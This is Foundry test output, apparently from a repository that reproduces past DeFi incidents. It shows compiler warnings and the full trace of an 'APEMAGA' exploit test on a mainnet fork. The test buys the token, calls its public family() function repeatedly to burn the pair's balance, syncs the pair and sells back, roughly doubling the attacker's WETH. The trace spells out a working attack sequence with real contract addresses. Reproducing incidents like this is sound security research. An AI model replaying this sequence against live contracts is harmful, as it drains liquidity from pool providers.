Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.25s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-06/APEMAGA_exp.sol:25:5:
   |
25 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-06/APEMAGA_exp.sol:26:5:
   |
26 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 533.09ms (1.89ms CPU time)

Ran 1 test for src/test/2024-06/APEMAGA_exp.sol:ContractTest
[PASS] testExploit() (gas: 220739)
Logs:
  [Begin] Attacker WETH before exploit: 9.000000000000000000
  [End] Attacker WETH after exploit: 18.246306107867500219

Traces:
  [276230] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 20175261 [2.017e7])
    │   └─ ← [Return] 0
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2)
    │   └─ ← [Return] [0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c], []
    ├─ [0] VM::load(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000007ce66c50e2840000)
    │   └─ ← [Return]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 9000000000000000000 [9e18]
    └─ ← [Stop]

  [268939] ContractTest::testExploit()
    ├─ [2534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 9000000000000000000 [9e18]
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker WETH before exploit", val: 9000000000000000000 [9e18], decimals: 18)
    ├─ [24420] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 8000000000000000000000 [8e21])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 8000000000000000000000 [8e21])
    │   ├─  storage changes:
    │   │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0x0000000000000000000000000000000000000000000001b1ae4d6e2ef5000000
    │   └─ ← [Return] true
    ├─ [116227] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactETHForTokens{value: 100000000000000000}(0, [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1719397763 [1.719e9])
    │   ├─ [2504] 0x85705829c2f71EE3c40A7C28f6903e7c797c9433::getReserves() [staticcall]
    │   │   └─ ← [Return] 54765572250112844423 [5.476e19], 9146306958660137885 [9.146e18], 1719397583 [1.719e9]
    │   ├─ [23974] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::deposit{value: 100000000000000000}()
    │   │   ├─ emit Deposit(dst: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, wad: 100000000000000000 [1e17])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0 → 0x000000000000000000000000000000000000000000000000016345785d8a0000
    │   │   └─ ← [Stop]
    │   ├─ [8062] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x85705829c2f71EE3c40A7C28f6903e7c797c9433, 100000000000000000 [1e17])
    │   │   ├─ emit Transfer(from: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, to: 0x85705829c2f71EE3c40A7C28f6903e7c797c9433, value: 100000000000000000 [1e17])
    │   │   ├─  storage changes:
    │   │   │   @ 0xfb19a963956c9cb662dd3ae48988c4b90766df71ea130109840abe0a1b23dba8: 0x000000000000000000000000000000000000000000000000016345785d8a0000 → 0
    │   │   │   @ 0xb5f4e605e6efe491e42b722be27664f94e42d6c000262bdf4e398a4eb155b5c6: 0x0000000000000000000000000000000000000000000000007eee35b83d9ef39d → 0x00000000000000000000000000000000000000000000000080517b309b28f39d
    │   │   └─ ← [Return] true
    │   ├─ [64922] 0x85705829c2f71EE3c40A7C28f6903e7c797c9433::swap(590538983774190388 [5.905e17], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [30005] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 590538983774190388 [5.905e17])
    │   │   │   ├─ emit Transfer(from: 0x85705829c2f71EE3c40A7C28f6903e7c797c9433, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 590538983774190388 [5.905e17])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xffff47e35c0a7ba9e7dec46c4767fd2be1c8907d110b2b7ab79c82c300e0631e: 0x000000000000000000000000000000000000000000000002f80665cd10f76287 → 0x000000000000000000000000000000000000000000000002efd461b95f15e753
    │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000000008320413b1e17b34
    │   │   │   └─ ← [Return] true
    │   │   ├─ [560] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::balanceOf(0x85705829c2f71EE3c40A7C28f6903e7c797c9433) [staticcall]
    │   │   │   └─ ← [Return] 54175033266338654035 [5.417e19]
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x85705829c2f71EE3c40A7C28f6903e7c797c9433) [staticcall]
    │   │   │   └─ ← [Return] 9246306958660137885 [9.246e18]
    │   │   ├─ emit Sync(reserve0: 54175033266338654035 [5.417e19], reserve1: 9246306958660137885 [9.246e18])
    │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 0, amount1In: 100000000000000000 [1e17], amount0Out: 590538983774190388 [5.905e17], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x0000000000000000000000000000000000b20d979c43d9fb205add69c41f7160 → 0x0000000000000000000000000000000000bc12d7196f2ad30a0cbc3b129e2fb4
    │   │   │   @ 8: 0x667beccf0000000000007eee35b83d9ef39d000000000002f80665cd10f76287 → 0x667bed0b00000000000080517b309b28f39d000000000002efd461b95f15e753
    │   │   │   @ 10: 0x00000000000000000000000000000000442c012537b242ca92e71df034b30068 → 0x000000000000000000000000000000004593449a8ff6a5a02c8e74755cf78b6c
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [100000000000000000 [1e17], 590538983774190388 [5.905e17]]
    ├─ [10604] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::family(0x85705829c2f71EE3c40A7C28f6903e7c797c9433)
    │   ├─ emit Transfer(from: 0x85705829c2f71EE3c40A7C28f6903e7c797c9433, to: 0x0000000000000000000000000000000000000000, value: 54120858233072315380 [5.412e19])
    │   ├─  storage changes:
    │   │   @ 2: 0x000000000000000000000000000000000000000000000004f116239de50fa22d → 0x000000000000000000000000000000000000000000000002020239cc6382b639
    │   │   @ 0xffff47e35c0a7ba9e7dec46c4767fd2be1c8907d110b2b7ab79c82c300e0631e: 0x000000000000000000000000000000000000000000000002efd461b95f15e753 → 0x00000000000000000000000000000000000000000000000000c077e7dd88fb5f
    │   └─ ← [Stop]
    ├─ [3804] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::family(0x85705829c2f71EE3c40A7C28f6903e7c797c9433)
    │   ├─ emit Transfer(from: 0x85705829c2f71EE3c40A7C28f6903e7c797c9433, to: 0x0000000000000000000000000000000000000000, value: 54120858233072316 [5.412e16])
    │   ├─  storage changes:
    │   │   @ 2: 0x000000000000000000000000000000000000000000000002020239cc6382b639 → 0x0000000000000000000000000000000000000000000000020141f32a2196cb7d
    │   │   @ 0xffff47e35c0a7ba9e7dec46c4767fd2be1c8907d110b2b7ab79c82c300e0631e: 0x00000000000000000000000000000000000000000000000000c077e7dd88fb5f → 0x000000000000000000000000000000000000000000000000000031459b9d10a3
    │   └─ ← [Stop]
    ├─ [3804] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::family(0x85705829c2f71EE3c40A7C28f6903e7c797c9433)
    │   ├─ emit Transfer(from: 0x85705829c2f71EE3c40A7C28f6903e7c797c9433, to: 0x0000000000000000000000000000000000000000, value: 54120858233072 [5.412e13])
    │   ├─  storage changes:
    │   │   @ 0xffff47e35c0a7ba9e7dec46c4767fd2be1c8907d110b2b7ab79c82c300e0631e: 0x000000000000000000000000000000000000000000000000000031459b9d10a3 → 0x0000000000000000000000000000000000000000000000000000000c9d1567b3
    │   │   @ 2: 0x0000000000000000000000000000000000000000000000020141f32a2196cb7d → 0x0000000000000000000000000000000000000000000000020141c1f1230f228d
    │   └─ ← [Stop]
    ├─ [7612] 0x85705829c2f71EE3c40A7C28f6903e7c797c9433::sync()
    │   ├─ [560] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::balanceOf(0x85705829c2f71EE3c40A7C28f6903e7c797c9433) [staticcall]
    │   │   └─ ← [Return] 54175033267 [5.417e10]
    │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x85705829c2f71EE3c40A7C28f6903e7c797c9433) [staticcall]
    │   │   └─ ← [Return] 9246306958660137885 [9.246e18]
    │   ├─ emit Sync(reserve0: 54175033267 [5.417e10], reserve1: 9246306958660137885 [9.246e18])
    │   ├─  storage changes:
    │   │   @ 8: 0x667bed0b00000000000080517b309b28f39d000000000002efd461b95f15e753 → 0x667bed0b00000000000080517b309b28f39d0000000000000000000c9d1567b3
    │   └─ ← [Stop]
    ├─ [24617] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::approve(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, 99999999000000000000000000 [9.999e25])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 99999999000000000000000000 [9.999e25])
    │   ├─  storage changes:
    │   │   @ 0xd930737ffa814cd96da69b30a93006de9a36dee6fce4901ef0447c9b8df79eee: 0 → 0x00000000000000000000000000000000000000000052b7d2cee7561f3c9c0000
    │   └─ ← [Return] true
    ├─ [560] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 590538983774190388 [5.905e17]
    ├─ [33480] 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D::swapExactTokensForTokens(590538983774190388 [5.905e17], 0, [0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [504] 0x85705829c2f71EE3c40A7C28f6903e7c797c9433::getReserves() [staticcall]
    │   │   └─ ← [Return] 54175033267 [5.417e10], 9246306958660137885 [9.246e18], 1719397643 [1.719e9]
    │   ├─ [5964] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x85705829c2f71EE3c40A7C28f6903e7c797c9433, 590538983774190388 [5.905e17])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x85705829c2f71EE3c40A7C28f6903e7c797c9433, value: 590538983774190388 [5.905e17])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, value: 99999998409461016225809612 [9.999e25])
    │   │   ├─  storage changes:
    │   │   │   @ 0xffff47e35c0a7ba9e7dec46c4767fd2be1c8907d110b2b7ab79c82c300e0631e: 0x0000000000000000000000000000000000000000000000000000000c9d1567b3 → 0x000000000000000000000000000000000000000000000000083204204ef6e2e7
    │   │   │   @ 0xd930737ffa814cd96da69b30a93006de9a36dee6fce4901ef0447c9b8df79eee: 0x00000000000000000000000000000000000000000052b7d2cee7561f3c9c0000 → 0x00000000000000000000000000000000000000000052b7d2c6b5520b8aba84cc
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000000008320413b1e17b34 → 0
    │   │   └─ ← [Return] true
    │   ├─ [19263] 0x85705829c2f71EE3c40A7C28f6903e7c797c9433::swap(0, 9246306107867500219 [9.246e18], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [6062] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 9246306107867500219 [9.246e18])
    │   │   │   ├─ emit Transfer(from: 0x85705829c2f71EE3c40A7C28f6903e7c797c9433, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 9246306107867500219 [9.246e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb5f4e605e6efe491e42b722be27664f94e42d6c000262bdf4e398a4eb155b5c6: 0x00000000000000000000000000000000000000000000000080517b309b28f39d → 0x000000000000000000000000000000000000000000000000000000c6173164e2
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000007ce66c50e2840000 → 0x000000000000000000000000000000000000000000000000fd37e6bb667b8ebb
    │   │   │   └─ ← [Return] true
    │   │   ├─ [560] 0x56FF4AfD909AA66a1530fe69BF94c74e6D44500C::balanceOf(0x85705829c2f71EE3c40A7C28f6903e7c797c9433) [staticcall]
    │   │   │   └─ ← [Return] 590539037949223655 [5.905e17]
    │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x85705829c2f71EE3c40A7C28f6903e7c797c9433) [staticcall]
    │   │   │   └─ ← [Return] 850792637666 [8.507e11]
    │   │   ├─ emit Sync(reserve0: 590539037949223655 [5.905e17], reserve1: 850792637666 [8.507e11])
    │   │   ├─ emit Swap(sender: 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D, amount0In: 590538983774190388 [5.905e17], amount1In: 0, amount0Out: 0, amount1Out: 9246306107867500219 [9.246e18], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x667bed0b00000000000080517b309b28f39d0000000000000000000c9d1567b3 → 0x667bed0b000000000000000000c6173164e2000000000000083204204ef6e2e7
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [590538983774190388 [5.905e17], 9246306107867500219 [9.246e18]]
    ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 18246306107867500219 [1.824e19]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WETH after exploit", val: 18246306107867500219 [1.824e19], decimals: 18)
    ├─  storage changes:
    │   @ 0xd930737ffa814cd96da69b30a93006de9a36dee6fce4901ef0447c9b8df79eee: 0 → 0x00000000000000000000000000000000000000000052b7d2cee7561f3c9c0000
    │   @ 12: 0 → 1
    │   @ 2: 0x000000000000000000000000000000000000000000000004f116239de50fa22d → 0x0000000000000000000000000000000000000000000000020141c1f1230f228d
    │   @ 0x466c74776b1cb1a6f02cc765a14cd3bfd6607c3d7fcc2476c94e5bc071e25f00: 0 → 0x0000000000000000000000000000000000000000000001b1ae4d6e2ef5000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.70s (3.96s CPU time)

Ran 2 test suites in 5.73s (6.24s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
